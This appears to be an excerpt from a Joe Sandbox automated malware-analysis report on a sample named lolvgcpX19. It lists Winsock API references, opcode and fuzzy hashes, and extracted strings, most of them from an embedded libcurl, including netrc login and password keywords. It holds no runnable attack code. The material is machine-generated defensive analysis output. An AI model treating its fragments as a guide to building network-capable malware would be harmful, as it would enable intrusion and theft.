                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 5504cd51007005db8927f0784c5fd47cc431fb1141e5f6402eabb2a57037b8b0
                                  • Instruction ID: 60c30068877849ad76e1540acf526e45ec47bb1bbaae27fdaa1f4b9996ee4891
                                  • Opcode Fuzzy Hash: 5504cd51007005db8927f0784c5fd47cc431fb1141e5f6402eabb2a57037b8b0
                                  • Instruction Fuzzy Hash: 8E01A7B9B107109FD6148F19DC85B56BBA5EF84720F06855DEA981B361C331AC108BD1
                                  APIs
                                  • socket.WS2_32(?,0104B280,00000000,-00000001,00000000,0104B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0104AF67
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID:
                                  • API String ID: 98920635-0
                                  • Opcode ID: 9e3a512b415a0ad5a01314b6e0b125609308271e4494e1585ebc4a9bb1de00ff
                                  • Instruction ID: fb44e682613fc8b1b661094b528af36203d1961e2ffa34bf1d5cfd78d7b2cef4
                                  • Opcode Fuzzy Hash: 9e3a512b415a0ad5a01314b6e0b125609308271e4494e1585ebc4a9bb1de00ff
                                  • Instruction Fuzzy Hash: 2DE06DB6A08321ABD650CA4CE8849ABF7A9EFC4B20F054A59B99463304C330AC418BE1
                                  APIs
                                  • closesocket.WS2_32(?,01049422,?,?,?,?,?,?,?,?,?,?,?,01033377,01414C60,00000000), ref: 0104B04D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: e6cc94970dda8b0d9ce95dc9f1e4c6a50faae5ab2f1b04a3081ffe9a9245f7d7
                                  • Instruction ID: 0176e544a765ebddceb6382b514a9b0ff094a28b15073104a32c196af345b812
                                  • Opcode Fuzzy Hash: e6cc94970dda8b0d9ce95dc9f1e4c6a50faae5ab2f1b04a3081ffe9a9245f7d7
                                  • Instruction Fuzzy Hash: D5D0C27830020157DA60CA18CCC4A577AAB7FC0211FA8CBB8F26C4A150C73BC8438A01
                                  APIs
                                  • ioctlsocket.WS2_32(?,8004667E,?,?,00FBAF56,?,00000001), ref: 00FE67FC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: f56a927e121d313fb3eea7effaa763e943d88cf2e57a5aef322819a2f1dc5154
                                  • Instruction ID: 5335767ea5ac199031c40fe1b5b74374b33508c8d32c8bbad6a2ae0802a3cfbb
                                  • Opcode Fuzzy Hash: f56a927e121d313fb3eea7effaa763e943d88cf2e57a5aef322819a2f1dc5154
                                  • Instruction Fuzzy Hash: 59C012F1118101AFC6088B14D855A6F76D8DB85355F01581CB04A81180EA345994CA1A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 72b08a4387788cc96a94ec5df5562c25c5496d24b2749bf18962dca813483809
                                  • Instruction ID: 0faef0659c9571b45e1c1f89a103736744ba5623c04a3bc07d31d28799dd7bb7
                                  • Opcode Fuzzy Hash: 72b08a4387788cc96a94ec5df5562c25c5496d24b2749bf18962dca813483809
                                  • Instruction Fuzzy Hash: E631A0B4D087069BCB10FFB9C98469EBBF0AF54344F00896ED898A7351E7749A44DF92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $d$nil)
                                  • API String ID: 0-394766432
                                  • Opcode ID: e3ee0bf0b3cfa2117f7e7f8fdda4ddd5e182edc06c92577cbce7a374e2a7f246
                                  • Instruction ID: b663d0008c4a1009aa16395aac1aa3e8f73bd08e3ce89c57175cd8b1d1d0aa45
                                  • Opcode Fuzzy Hash: e3ee0bf0b3cfa2117f7e7f8fdda4ddd5e182edc06c92577cbce7a374e2a7f246
                                  • Instruction Fuzzy Hash: 7A139D706083018FD726DF2CC09062ABBE5BFC9718F144E6DEA959B3A5D771E845CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                  • API String ID: 0-122532811
                                  • Opcode ID: 0d09d865bc7e4047afec65f3420e2a81ef5ab88c6df4f25654174afdf19d1759
                                  • Instruction ID: 98f8bc85ba791598ec98ec612acb31bd3c3b51c1538687628d73728f590b8b25
                                  • Opcode Fuzzy Hash: 0d09d865bc7e4047afec65f3420e2a81ef5ab88c6df4f25654174afdf19d1759
                                  • Instruction Fuzzy Hash: 65421771B08701AFE709DE28CC81B6BB7EAEBD4704F04892CF54D97291D775A8049B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                  • API String ID: 0-1574211403
                                  • Opcode ID: c5f5b889dd9f55f97f86532bdc0a665ef113f0604b66735adb551659331664ef
                                  • Instruction ID: c5741eeff8423b2d682fc1e6d56f1c058d52103b9c4bc2aabd15e992859d6b49
                                  • Opcode Fuzzy Hash: c5f5b889dd9f55f97f86532bdc0a665ef113f0604b66735adb551659331664ef
                                  • Instruction Fuzzy Hash: 5561F8E5E0830267E758A628DD51B7FB6DD9BE5308F04843DFDCA96282FAB1D9048253
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                  • API String ID: 0-1914377741
                                  • Opcode ID: 5477e347538c1f652ff266a7dfd39a28676e056a8e4528a912888a2ee702e069
                                  • Instruction ID: b1ee253e363eb91f7467aad014840b6c5d333ef481b31ba08208429cd9cb8008
                                  • Opcode Fuzzy Hash: 5477e347538c1f652ff266a7dfd39a28676e056a8e4528a912888a2ee702e069
                                  • Instruction Fuzzy Hash: 8D726CB1E08B419FE7318A28C5467A7B7D26F92B54F08861CEC844F293E776DC84E791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$;$?$?$xn--$xn--
                                  • API String ID: 0-543057197
                                  • Opcode ID: 32417d742cc29962346f79ca6b6e3974abad01a4dffef011b8a28edc5612f78c
                                  • Instruction ID: 492787effeb8799316ae269e65b7fcded2bb7ac6dd3543fbc7bee2ba8892e8f6
                                  • Opcode Fuzzy Hash: 32417d742cc29962346f79ca6b6e3974abad01a4dffef011b8a28edc5612f78c
                                  • Instruction Fuzzy Hash: 6222E5F2A04303ABEB519A2C9CC0B6F76E4AF95348F04457CF9C997296EB35D904C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: baf5e70dc52a6fe09232c68e35e6ae290924ab6812f23c63c6c499ed37214977
                                  • Instruction ID: 6ff593ef17b77d5b2072b0649e978900ca33137313da2aa79626824edaa39a42
                                  • Opcode Fuzzy Hash: baf5e70dc52a6fe09232c68e35e6ae290924ab6812f23c63c6c499ed37214977
                                  • Instruction Fuzzy Hash: D6C2AF32A087418FD714DF28C4907AAB7E2FFC9364F19892DE8999B351D730ED459B82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: 348b99e021840de77e2cfbea6b6ba32b6b41c08c74b81a3183eee1abfbc01d48
                                  • Instruction ID: 5dbdc20e10d63eece9ffa9f9f71277a1f2cb21283d1efc9095ee67b6478a2f0b
                                  • Opcode Fuzzy Hash: 348b99e021840de77e2cfbea6b6ba32b6b41c08c74b81a3183eee1abfbc01d48
                                  • Instruction Fuzzy Hash: 8F82B071A083019FD714EE28C8847ABB7E1AFD5724F148A7DF8A997291D730DC49DB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: default$login$macdef$machine$netrc.c$password
                                  • API String ID: 0-1043775505
                                  • Opcode ID: 6ded661f0045045872edf0f4766b98ef8e5d123143a25a710c4ee359d611c596
                                  • Instruction ID: c9cd2d359f1b23c9e72f15c9d2280e04ca5cfb27047ef572d1b60369050893dc
                                  • Opcode Fuzzy Hash: 6ded661f0045045872edf0f4766b98ef8e5d123143a25a710c4ee359d611c596
                                  • Instruction Fuzzy Hash: 4FE129719083C59BE7119F12884672B7BD0AFA5798F18082CF8C5DB381D7B9D948E7A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                  • API String ID: 0-4201740241
                                  • Opcode ID: e58db08e04a21979f2bc87725a7a3d4547329f6a03c6cc85fa971ebc1950ba3c
                                  • Instruction ID: 2200aeacafdc1700dd50c245b88e09a1359ee5d737e3fabedfc9c3680eabb47e
                                  • Opcode Fuzzy Hash: e58db08e04a21979f2bc87725a7a3d4547329f6a03c6cc85fa971ebc1950ba3c
                                  • Instruction Fuzzy Hash: 7362D0B09147819BD715CF25C8907AAB3E4FF98304F04962DE88D8B352E774FA94CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                  • API String ID: 0-3285806060
                                  • Opcode ID: 4cd9bb2f49bfeb52c2cc9255db5e8c9fa857b63b9ba7d3714b973ee8c4d074ca
                                  • Instruction ID: 42e9fb79ac5b827486d9c34af7b6a06794c0d7b420707bcdff8870b15912c260
                                  • Opcode Fuzzy Hash: 4cd9bb2f49bfeb52c2cc9255db5e8c9fa857b63b9ba7d3714b973ee8c4d074ca
                                  • Instruction Fuzzy Hash: FDD11872A083018BF725DE28CA5437EBBD9AFD5314F05896EF9C5E7281DB709944C742
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$@$gfff$gfff
                                  • API String ID: 0-2633265772
                                  • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction ID: 09c926bb8372edc2a696b1e479e8ac2b293c6214a2658853d6a33ea57896b185
                                  • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction Fuzzy Hash: D8D1C37160470A8BD716DF6CC8A031BBBE2AF84358F08CA6DE9498B785D770DD49C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-227171996
                                  • Opcode ID: a0c12558088688f939b7db8cada542d684d9c8ac8627866db95b5d262f67bcf2
                                  • Instruction ID: 1618b2973fd23f429c496e8e87a49adc9f817b92b69df9a0e2510c7345e836e2
                                  • Opcode Fuzzy Hash: a0c12558088688f939b7db8cada542d684d9c8ac8627866db95b5d262f67bcf2
                                  • Instruction Fuzzy Hash: 21E242B1A083818FD729DF29C48075BFBE1BF88758F20891DE99997359E771D844CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .12$M 0.$NT L
                                  • API String ID: 0-1919902838
                                  • Opcode ID: 1a4307134d43a698e98f1b123e216cd77925825303090349be1734d463a97db6
                                  • Instruction ID: 2dc15d13ff8418c65f5cb2e0977cb7872e9a9ff89911d6e09a21f86a518c2945
                                  • Opcode Fuzzy Hash: 1a4307134d43a698e98f1b123e216cd77925825303090349be1734d463a97db6
                                  • Instruction Fuzzy Hash: CB512674A003819BDB11DF22C884BAA77F4FF45314F098569FC489F252E379EA84DB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #$4
                                  • API String ID: 0-353776824
                                  • Opcode ID: 8ca050c5b1f5219ac0db8c7216acbd4d9308917a49c5204cce10325fd7e11e03
                                  • Instruction ID: 004c48369d0b64e8611244a249ead032fc2375de59c926ba4348a8310c16e1fb
                                  • Opcode Fuzzy Hash: 8ca050c5b1f5219ac0db8c7216acbd4d9308917a49c5204cce10325fd7e11e03
                                  • Instruction Fuzzy Hash: 1822BF355287428FD715CF28C4807AAFBE0FF84718F048A3DEA9997391D775A885CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H$xn--
                                  • API String ID: 0-4022323365
                                  • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                  • Instruction ID: 7723282151e1a7f1407661e8bfcd5fc306ed01c69831ed7e58a07f578ccf1151
                                  • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                  • Instruction Fuzzy Hash: 9EE15A71A087158BD71ADE2CD8E072AB7D2ABC4218F188A3DDBD6873C1E774DE458742
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Downgrades to HTTP/1.1$multi.c
                                  • API String ID: 0-3089350377
                                  • Opcode ID: 79bf221af364e1d6cd196a22b0ee083e4e4e9f39282f3486fabbfdb2632c84c0
                                  • Instruction ID: ba4f3b56ad7a8a2a723dfb8687c71dfd40976509f831ff51297daa733e3ac478
                                  • Opcode Fuzzy Hash: 79bf221af364e1d6cd196a22b0ee083e4e4e9f39282f3486fabbfdb2632c84c0
                                  • Instruction Fuzzy Hash: FAC10271E04302ABFB10AF64DC817AAB7E0BF94314F04453DF84897292E775E958EB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 127.0.0.1$::1
                                  • API String ID: 0-3302937015
                                  • Opcode ID: 6dce0b94298593e9b06aa90e557144ae394e2dce9e01c7eb1e739056faa8e940
                                  • Instruction ID: d25f96f43604d2a972460c6face7c7cf512005efb8530632d52a48e0d8527f2c
                                  • Opcode Fuzzy Hash: 6dce0b94298593e9b06aa90e557144ae394e2dce9e01c7eb1e739056faa8e940
                                  • Instruction Fuzzy Hash: 15A1C3B1C043429BE710DF24C88576BB7E4BF99308F059A79F9888B261F775E990C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BQ`
                                  • API String ID: 0-1649249777
                                  • Opcode ID: f395a501b8b3608f4abe1e0d0e03fcee3d44f2803782e0725288724ccc3948a2
                                  • Instruction ID: 2d60849eee7b6900c77858b67a9838674891f73973ce1699ced0d10487b563e6
                                  • Opcode Fuzzy Hash: f395a501b8b3608f4abe1e0d0e03fcee3d44f2803782e0725288724ccc3948a2
                                  • Instruction Fuzzy Hash: F3A29C71A18356CFCB18CF18C4906A9BBF2FF88314F19866DE9998B381D774E944CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H
                                  • API String ID: 0-2852464175
                                  • Opcode ID: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                  • Instruction ID: d5d23a17ab6a17dc632d8c4970e2aad0d0ea14717b4e2ab7ad0a5059b338c0e4
                                  • Opcode Fuzzy Hash: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                  • Instruction Fuzzy Hash: 9B91C131B083118FC759CE1CC49016FB7E2ABC9320F1A857DEDD697389DA31AC468B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: curl
                                  • API String ID: 0-65018701
                                  • Opcode ID: 8a23380cb13b069f639ad729592a00130628a68afd933245519bb2117a4b065d
                                  • Instruction ID: 940486dd5eb8beaa12f3fdc9262326f3457a8ae0a1ee2634e26ab1e8221c47a6
                                  • Opcode Fuzzy Hash: 8a23380cb13b069f639ad729592a00130628a68afd933245519bb2117a4b065d
                                  • Instruction Fuzzy Hash: 146197B18087459BD721DF14C880BDBB3F8AF99304F449A6DED8C9B212E731E698C752
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: slist.c
                                  • API String ID: 0-1580612069
                                  • Opcode ID: ac8a0653f01736180ed3d1c7e7fe227bf9c06b907ece3913d25822eb71b75eb1
                                  • Instruction ID: 319185097b0f5d88dc5f854d459d78f6b9f1a00b93727c900ef2860486612a1e
                                  • Opcode Fuzzy Hash: ac8a0653f01736180ed3d1c7e7fe227bf9c06b907ece3913d25822eb71b75eb1
                                  • Instruction Fuzzy Hash: 8A11D376F4131157FB316E819D82F22BA95AF94F50F194038EE085F296E761CC006FD2
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.2294457217.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, Offset: 006B4000, based on PE: false
                                  • Associated: 00000000.00000003.2294224463.00000000006B4000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_6b4000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f38136f4d23a06fa6bb6187782f041864f04c9beba320a3c3dd0ea7101de1d49
                                  • Instruction ID: 1da85c310a71d6a3996321022a1210133a76c1e34d85483f5dcbf2c167fe88b9
                                  • Opcode Fuzzy Hash: f38136f4d23a06fa6bb6187782f041864f04c9beba320a3c3dd0ea7101de1d49
                                  • Instruction Fuzzy Hash: 27B140A644E7C14FD71387304C786E1BFB1AF23214B0E86DBC4C58F4A3E259988AC766
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                  • Instruction ID: e8363f472d3157ee8a17f658e130a1f3af1704279605c4919079b53aa208ea32
                                  • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                  • Instruction Fuzzy Hash: 662264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 722f239b897cac5e1a4d8c430c26ccd9f9d97e6cc300e6e940f125c6d523148c
                                  • Instruction ID: 72296ad14d52c429ff9e89face1bb30cad946109919b542afced8c077a31d81b
                                  • Opcode Fuzzy Hash: 722f239b897cac5e1a4d8c430c26ccd9f9d97e6cc300e6e940f125c6d523148c
                                  • Instruction Fuzzy Hash: F012D776F483154FC30CED6DC992359FAD797C8310F1A893EA959DB3A0E9B9EC014A81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 461b2ae09a5da1628706fed44ca47560839de16c0ded91514c1bd0081850bbcc
                                  • Instruction ID: a6c800a752cf85ae3493510e9646ceb5808ab0052b83f320d3d1763b17e00d4a
                                  • Opcode Fuzzy Hash: 461b2ae09a5da1628706fed44ca47560839de16c0ded91514c1bd0081850bbcc
                                  • Instruction Fuzzy Hash: 41E136319083548BD724EF18C4443A6BBE2BF86364F24852DE4998B3D5D738DD46BBE1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 923946bd5f40e5583f9cf9ffb273a7dc8d8592b1f6a1cd3ee28f010054465ea0
                                  • Instruction ID: d3dbe002de4598293bea9c1128d64aca0dfb75bc4b53489ab4c80602c4acd375
                                  • Opcode Fuzzy Hash: 923946bd5f40e5583f9cf9ffb273a7dc8d8592b1f6a1cd3ee28f010054465ea0
                                  • Instruction Fuzzy Hash: 75C1BF75614B428FD324DF29C480A26BBE2FF85310F158A2DE6EB87B91D730E845CB51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9928838839fa20898aa9e52e8041a4be4af08fc9548721961dd3427115cbc140
                                  • Instruction ID: 8bcb42533a41287eab2e8e96dd1ba6bae83782a22616485874841fe525d57828
                                  • Opcode Fuzzy Hash: 9928838839fa20898aa9e52e8041a4be4af08fc9548721961dd3427115cbc140
                                  • Instruction Fuzzy Hash: 9CC180B1625602CBD369CF19C495265FBE1FF81310F19466DD6AB8F782CB74E881CB81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                  • Instruction ID: af2cba68a7ad946d79fa5a70c6151bcda377a386d34a9cfcf676b634dc67bb68
                                  • Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                  • Instruction Fuzzy Hash: 87A104716083018FD794CE2CC88062FBBE6AFC9350F19866DF9D597396EA34D8458B81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                  • Instruction ID: ef07f4744fc12914d943376f9d92d090f2428ba15b2d14cdd9f304901d0e033c
                                  • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
